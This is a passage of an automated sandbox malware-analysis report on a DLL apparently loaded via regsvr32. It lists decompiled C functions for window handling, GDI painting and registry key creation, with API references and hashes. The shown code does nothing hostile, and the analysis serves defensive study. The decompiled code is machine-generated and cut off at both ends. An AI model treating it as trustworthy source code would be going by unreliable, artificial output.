                                                                                                                				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                                				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                                				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                                					_t71 =  *((intOrPtr*)(E1001E375(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                                					if(_t71 != 0) {
                                                                                                                						_t85 =  *(_t71 + 0x20);
                                                                                                                						if( *(_t71 + 0x20) != 0) {
                                                                                                                							E10049170(_t71,  &_v52, 0, 0x30);
                                                                                                                							_t48 =  *(_t72 + 0x20);
                                                                                                                							_v44 = _t48;
                                                                                                                							_v40 = _t48;
                                                                                                                							_v52 = 0x28;
                                                                                                                							_v48 = 1;
                                                                                                                							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                                				E10013F46(_t61, _t72, GetWindowLongA, _t85);
                                                                                                                				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                                					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                                					if(_t43 != 0) {
                                                                                                                						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E10014064(_t61, _t72);
                                                                                                                				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2997958587-3887548279
                                                                                                                • Opcode ID: 6b22b949b9ce932dd13ac654eb79d8cff91feb19b65ffa35852a87b5f37b679d
                                                                                                                • Instruction ID: c82c6814ec38e1b5b6b101697f8324302a63334789065a76628bdfc54f8d4eea
                                                                                                                • Opcode Fuzzy Hash: 6b22b949b9ce932dd13ac654eb79d8cff91feb19b65ffa35852a87b5f37b679d
                                                                                                                • Instruction Fuzzy Hash: 5031B074A00711AFDB10DFB4C888A9EB7E8FF48650B13056DF5529B6A1DB30E880CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10032CDF(void* __ebx, void* __ecx) {
                                                                                                                				void* __ebp;
                                                                                                                				void* _t28;
                                                                                                                				void* _t36;
                                                                                                                				signed char _t37;
                                                                                                                				intOrPtr _t41;
                                                                                                                				void* _t42;
                                                                                                                				void* _t44;
                                                                                                                				intOrPtr _t45;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t36 = __ebx;
                                                                                                                				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                                				if(_t41 == 0) {
                                                                                                                					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                                					L14:
                                                                                                                					_t42 = E10013FEA(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
                                                                                                                					if(_t42 != 0) {
                                                                                                                						L7:
                                                                                                                						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
                                                                                                                							L18:
                                                                                                                							return _t42;
                                                                                                                						}
                                                                                                                						_push(_t36);
                                                                                                                						_t37 =  *(_t46 + 0x1c);
                                                                                                                						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
                                                                                                                							if((_t37 & 0x00000002) == 0) {
                                                                                                                								L16:
                                                                                                                								_push(_t37);
                                                                                                                								_push(0);
                                                                                                                								_push(_t42);
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							_t39 = _t42;
                                                                                                                							if(E1001795E(_t42) != 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						} else {
                                                                                                                							L12:
                                                                                                                							_push(_t37);
                                                                                                                							_push(_t42);
                                                                                                                							_push(_t45);
                                                                                                                							L17:
                                                                                                                							_t42 = E10032CDF(_t37, _t39);
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t45;
                                                                                                                				}
                                                                                                                				_t28 = E10013FEA(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
                                                                                                                				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                                				while(_t28 == 0) {
                                                                                                                					_t41 = E10032C8A(_t45, E10013FEA(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
                                                                                                                					if(_t41 == 0 || _t41 == _t45) {
                                                                                                                						goto L14;
                                                                                                                					} else {
                                                                                                                						_t28 = E10013FEA(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t42 = E10013FEA(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                                                                                				goto L7;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetWindow.USER32(?,00000002), ref: 10032CFA
                                                                                                                • GetParent.USER32(?), ref: 10032D0B
                                                                                                                • GetWindow.USER32(?,00000002), ref: 10032D2E
                                                                                                                • GetWindow.USER32(?,00000002), ref: 10032D40
                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 10032D4F
                                                                                                                • IsWindowVisible.USER32(?), ref: 10032D69
                                                                                                                • GetTopWindow.USER32(?), ref: 10032D8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParentVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 506644340-0
                                                                                                                • Opcode ID: fa9f5f524476207fbf08464c865b90a75efb3f529bc22b917ca692e7b6724187
                                                                                                                • Instruction ID: 7fbb9b8bb4128a6ebb760fd7c23c45e267de0c3fd4b5490f83dbd2ad19ab79f8
                                                                                                                • Opcode Fuzzy Hash: fa9f5f524476207fbf08464c865b90a75efb3f529bc22b917ca692e7b6724187
                                                                                                                • Instruction Fuzzy Hash: 9E21B032A00626AFEA62EB708C19F9F77ECFF44681F064528F985AF161D621EC01C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10043D2F(void* __ecx) {
                                                                                                                				struct tagMSG _v28;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t21;
                                                                                                                				intOrPtr _t24;
                                                                                                                				int _t31;
                                                                                                                				intOrPtr _t33;
                                                                                                                				void* _t38;
                                                                                                                				void* _t39;
                                                                                                                				int _t40;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t40 = 0xf;
                                                                                                                				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                                                                					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                                                                					__eflags = _t21;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						DispatchMessageA( &_v28);
                                                                                                                						_push(0);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t21;
                                                                                                                				}
                                                                                                                				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                                                                				_t36 =  *((intOrPtr*)(_t24 + 0x84));
                                                                                                                				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
                                                                                                                				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
                                                                                                                				SetRectEmpty(_t39 + 0xc);
                                                                                                                				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                                                                				_t38 = E10013FEA(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
                                                                                                                				_t31 = LockWindowUpdate( *(_t38 + 0x20));
                                                                                                                				_t43 = _t31;
                                                                                                                				if(_t31 == 0) {
                                                                                                                					_push(3);
                                                                                                                				} else {
                                                                                                                					_push(0x403);
                                                                                                                				}
                                                                                                                				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
                                                                                                                				_t33 = E1000CCCE(0, _t36, _t38, _t39, _t43);
                                                                                                                				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                                                                				return _t33;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • GetMessageA.USER32 ref: 10043D4E
                                                                                                                • DispatchMessageA.USER32 ref: 10043D61
                                                                                                                • PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10043D70
                                                                                                                • SetRectEmpty.USER32(?), ref: 10043D94
                                                                                                                • GetDesktopWindow.USER32 ref: 10043DAC
                                                                                                                • LockWindowUpdate.USER32(?), ref: 10043DBD
                                                                                                                • GetDCEx.USER32 ref: 10043DD4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192691108-0
                                                                                                                • Opcode ID: 84d8b26e7ebad14b7531b127a920c320bb276a2296806e924b7d622da3e51ed5
                                                                                                                • Instruction ID: 839274ef87aa8f2479dcd51d4f325cfe662143961794ff2ef2d296bc339d2c34
                                                                                                                • Opcode Fuzzy Hash: 84d8b26e7ebad14b7531b127a920c320bb276a2296806e924b7d622da3e51ed5
                                                                                                                • Instruction Fuzzy Hash: B5214DB2900705AFE3109F65CD88E97BBECFB09255F41497EF556C6520DB35E8048B20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1000F232(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t34;
                                                                                                                				void* _t36;
                                                                                                                				void* _t50;
                                                                                                                				void* _t68;
                                                                                                                				void* _t70;
                                                                                                                				void* _t71;
                                                                                                                
                                                                                                                				_push(0x18);
                                                                                                                				_t34 = E1004764D(0x1008e378, __ebx, __edi, __esi);
                                                                                                                				_t70 = __ecx;
                                                                                                                				_t73 =  *(_t71 + 8) - 0xffffffff;
                                                                                                                				if( *(_t71 + 8) != 0xffffffff) {
                                                                                                                					_t36 = E1001FDD8(__ebx, __edi, __ecx, _t73);
                                                                                                                					GetClientRect( *(_t70 + 0x20), _t71 - 0x24);
                                                                                                                					 *(_t71 - 0x10) =  *(_t71 - 0x10) & 0x00000000;
                                                                                                                					 *((intOrPtr*)(_t71 - 0x14)) = 0x1009b784;
                                                                                                                					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                                					L1000CFA3(_t71 - 0x14, __edi, _t71, CreateRectRgnIndirect(_t71 - 0x24));
                                                                                                                					_push(GetDC( *(_t70 + 0x20)));
                                                                                                                					_t68 = E1000CCCE(_t36, _t71 - 0x14, __edi, _t70, _t73);
                                                                                                                					E1000C878(_t68, _t71 - 0x14);
                                                                                                                					SendMessageA( *(_t70 + 0x20), 0x198,  *(_t71 + 8), _t71 - 0x24);
                                                                                                                					 *(_t71 - 0x20) =  *(_t71 - 0x20) - 2;
                                                                                                                					 *((intOrPtr*)(_t71 - 0x18)) =  *(_t71 - 0x20) + 2;
                                                                                                                					_t50 = E1000D13A(_t68, _t36);
                                                                                                                					PatBlt( *(_t68 + 4),  *(_t71 - 0x24),  *(_t71 - 0x20),  *((intOrPtr*)(_t71 - 0x1c)) -  *(_t71 - 0x24),  *((intOrPtr*)(_t71 - 0x18)) -  *(_t71 - 0x20), 0x5a0049);
                                                                                                                					E1000D13A(_t68, _t50);
                                                                                                                					ReleaseDC( *(_t70 + 0x20),  *(_t68 + 4));
                                                                                                                					 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                                                                					 *((intOrPtr*)(_t71 - 0x14)) = 0x10098308;
                                                                                                                					_t34 = L1000CFF6(_t71 - 0x14);
                                                                                                                				}
                                                                                                                				return E10047725(_t34);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000F239
                                                                                                                  • Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
                                                                                                                  • Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
                                                                                                                  • Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37
                                                                                                                • GetClientRect.USER32 ref: 1000F258
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 1000F271
                                                                                                                • GetDC.USER32(?), ref: 1000F283
                                                                                                                  • Part of subcall function 1000C878: SelectClipRgn.GDI32(?,00000000), ref: 1000C89A
                                                                                                                  • Part of subcall function 1000C878: SelectClipRgn.GDI32(?,00000004), ref: 1000C8B0
                                                                                                                • SendMessageA.USER32 ref: 1000F2AB
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172
                                                                                                                • PatBlt.GDI32(?,?,00000002,?,00000002,005A0049), ref: 1000F2E4
                                                                                                                • ReleaseDC.USER32(00000002,?), ref: 1000F2F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Select$CreateObject$ClipRect$BitmapBrushClientDeleteH_prolog3IndirectMessagePatternReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 330565451-0
                                                                                                                • Opcode ID: 6186e9cc5a34a70b238502e19c0a2f34d54109da1cebe8bcd7e3b9df80bdff20
                                                                                                                • Instruction ID: ae825c2a38aadfa6ad2d5e23964ba6a6f6cc26f5f9c6a76fa10b4d73fef854a5
                                                                                                                • Opcode Fuzzy Hash: 6186e9cc5a34a70b238502e19c0a2f34d54109da1cebe8bcd7e3b9df80bdff20
                                                                                                                • Instruction Fuzzy Hash: 35212876900209EFDB01DBE4CE899EEBBB9FF48311B504258F146B21A0DB35AA10DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10025EBB(intOrPtr __ecx) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _t32;
                                                                                                                
                                                                                                                				_t32 = __ecx;
                                                                                                                				_v24 = __ecx;
                                                                                                                				_v16 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                                					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					RegCloseKey(_v8);
                                                                                                                				}
                                                                                                                				if(_v12 != 0) {
                                                                                                                					RegCloseKey(_v12);
                                                                                                                				}
                                                                                                                				return _v16;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10025EE9
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F0C
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F28
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025F38
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025F42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreate$Open
                                                                                                                • String ID: software
                                                                                                                • API String ID: 1740278721-2010147023
                                                                                                                • Opcode ID: a693620a9bdadc2d65233cbb8c755513046fcc4be62f62047e902ce2899f5840
                                                                                                                • Instruction ID: 42a707912d468ef30717d4f9f71364dcb2c1a33e5db109ec3b3fe5a363bbd037
                                                                                                                • Opcode Fuzzy Hash: a693620a9bdadc2d65233cbb8c755513046fcc4be62f62047e902ce2899f5840
                                                                                                                • Instruction Fuzzy Hash: D011B376900159BBDB11DB9ADD88CDFFFBCEF85745F1040AAB505A2121D6719A00DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 10011DE7
                                                                                                                • GetWindowRect.USER32 ref: 10011E02
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10011E15
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10011E1E
                                                                                                                • EqualRect.USER32 ref: 10011E28
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10011E50
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10011E5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 443303494-0
                                                                                                                • Opcode ID: c15a09ac07a48be0984b4a1291725d30e8c33f56f84e94449a3ba1b09cd1a87a
                                                                                                                • Instruction ID: 653b9982ac67d4bb700100f7ae05e2449e18e935689f0f94f15c853775d568fb
                                                                                                                • Opcode Fuzzy Hash: c15a09ac07a48be0984b4a1291725d30e8c33f56f84e94449a3ba1b09cd1a87a
                                                                                                                • Instruction Fuzzy Hash: 2011E67650021AEFEB009FA5CD84EEBBBBDEB89750B14841AED1696254D730E950CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100208C9(void* __ecx, long* __edi, void* __esi) {
                                                                                                                				long _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t28;
                                                                                                                				void* _t31;
                                                                                                                				void* _t33;
                                                                                                                				signed int _t35;
                                                                                                                				long* _t40;
                                                                                                                				void* _t41;
                                                                                                                				void* _t42;
                                                                                                                
                                                                                                                				_t41 = __esi;
                                                                                                                				_t40 = __edi;
                                                                                                                				_t31 = __ecx;
                                                                                                                				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                                                                                				L10048E48(0, 0);
                                                                                                                				_t22 = L10001311(_t31, 0, __edi[3], 4);
                                                                                                                				_t33 = 2;
                                                                                                                				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                                                                                				_t46 = _t23;
                                                                                                                				if(_t23 == 0) {
                                                                                                                					LeaveCriticalSection( *(_t42 - 0x14));
                                                                                                                					_t23 = E1000A035(0, _t33, __edi, __esi, _t46);
                                                                                                                				}
                                                                                                                				 *(_t41 + 0xc) = _t23;
                                                                                                                				E10049170(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                                                                                				 *(_t41 + 8) = _t40[3];
                                                                                                                				TlsSetValue( *_t40, _t41);
                                                                                                                				_t35 =  *(_t42 + 8);
                                                                                                                				_t28 =  *(_t41 + 0xc);
                                                                                                                				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                                                                                					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                                                                                				}
                                                                                                                				_push( *(_t42 - 0x14));
                                                                                                                				LeaveCriticalSection();
                                                                                                                				return E10047725(_t28);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 100208D0
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 100208DA
                                                                                                                  • Part of subcall function 10048E48: RaiseException.KERNEL32(00000001,?,?,00000058,00000001,?,1000CECE,00000000,?,00000058,10006BB6), ref: 10048E88
                                                                                                                • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1), ref: 100208F1
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 100208FE
                                                                                                                  • Part of subcall function 1000A035: __CxxThrowException@8.LIBCMT ref: 1000A049
                                                                                                                • _memset.LIBCMT ref: 1002091D
                                                                                                                • TlsSetValue.KERNEL32(?,00000000,00000058,10006BB6), ref: 1002092E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 1002094F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 356813703-0
                                                                                                                • Opcode ID: 98d414390fac9f506d51d5796c25b4fdf544dcfcc370261e34cc0d108f0d8d08
                                                                                                                • Instruction ID: ff238277b6f589a0ea1e9e4a69460dfa4a67d484cbd372cfbc6c4e593db73dcd
                                                                                                                • Opcode Fuzzy Hash: 98d414390fac9f506d51d5796c25b4fdf544dcfcc370261e34cc0d108f0d8d08
                                                                                                                • Instruction Fuzzy Hash: 31118B74100205AFE710EF64CD86DAABBBAFF00350760C569F55AD6562CB30ACA0CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E100346D3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t14;
                                                                                                                				intOrPtr _t17;
                                                                                                                				void* _t18;
                                                                                                                				struct HINSTANCE__* _t19;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t38;
                                                                                                                
                                                                                                                				_t38 = __eflags;
                                                                                                                				_t32 = __edi;
                                                                                                                				_t31 = __edx;
                                                                                                                				_t25 = __ebx;
                                                                                                                				SetErrorMode(SetErrorMode(0) | 0x00008001);
                                                                                                                				_t14 = E1001E302(__ebx, __edi, SetErrorMode, _t38);
                                                                                                                				_t35 = _a4;
                                                                                                                				 *((intOrPtr*)(_t14 + 8)) = _t35;
                                                                                                                				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
                                                                                                                				E1001D754(_t14);
                                                                                                                				_t17 =  *((intOrPtr*)(E1001E302(__ebx, __edi, _t35, _t38) + 4));
                                                                                                                				_t39 = _t17;
                                                                                                                				if(_t17 != 0) {
                                                                                                                					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
                                                                                                                					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
                                                                                                                					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
                                                                                                                					E10034554(_t17, _t31, _t39);
                                                                                                                				}
                                                                                                                				_t18 = E1001E302(_t25, _t32, _t35, _t39);
                                                                                                                				_t40 =  *((char*)(_t18 + 0x14));
                                                                                                                				_pop(_t36);
                                                                                                                				if( *((char*)(_t18 + 0x14)) == 0) {
                                                                                                                					E1001A66C(_t36, _t40);
                                                                                                                				}
